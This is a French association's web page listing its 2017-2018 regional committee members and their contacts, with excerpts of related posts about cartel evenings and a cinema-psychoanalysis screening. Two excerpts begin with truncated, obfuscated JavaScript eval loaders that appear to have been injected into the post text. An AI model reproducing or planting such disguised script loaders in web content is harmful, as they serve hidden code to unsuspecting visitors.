Coordination Régionale

ACF-IDF
Comité de Coordination Régionale
2017-2018

Délégué régional

Pierre-Ludovic Lavoine lavoine.pl@gmail.com

Secrétaire

Djamila Mebtouche  dmebtouche14@orange.fr

Trésorier

Xavier Gommichon   gommichon.xavier@orange.fr

Délégué aux cartels

Marcelo Denis  marcelo.denis@free.fr

Mission transversale

France Jaigu jaigu@club-internet.fr

Responsable de la diffusion

Andrea Castillo-Denis acastillo96@hotmail.com


Responsable du Bureau Marne-Essonne (91-94-77)

Isabelle Magne  imagnemalinconi@gmail.com

Responsable du Bureau Oise-Marne (93-95- Compiègne)

Véronique Outrebon veronique_outrebon@yahoo.fr

Responsable du Bureau Seine-Oise (78-92)

Emmanuelle Chaminand Edelstein  emma.chaminand@free.fr


Confluents & Bibliothèque-Confluents

Rédactrice en chef,  Vanessa Wroblewski vanessa.wrob@gmail.com

Atelier ACF-EdP

« Criminologie lacanienne », Dario Morales damofer@orange.fr

Cafés psychanalyse Théâtre de Châtillon

José Rambeau rambeauj@club-internet.fr

 

Related posts

Les échos

  eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n...

Echos des cartels

Echos de la soirée des Cartels «  Lire Lacan, c’est y mettre du sien » eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...

Echos de Marne Essonne

Echo de la soirée cinéma-psychanalyse du mardi 13 juin à Orsay pour le film L’amant double de François Ozon Isabelle Ramirez et Isabelle Magne   Comme Freud s’inspirait d’E.T.A. Hoffmann pour parler du surgissement de l’angoisse face à la figure du double, Laurent Dupont a brillamment...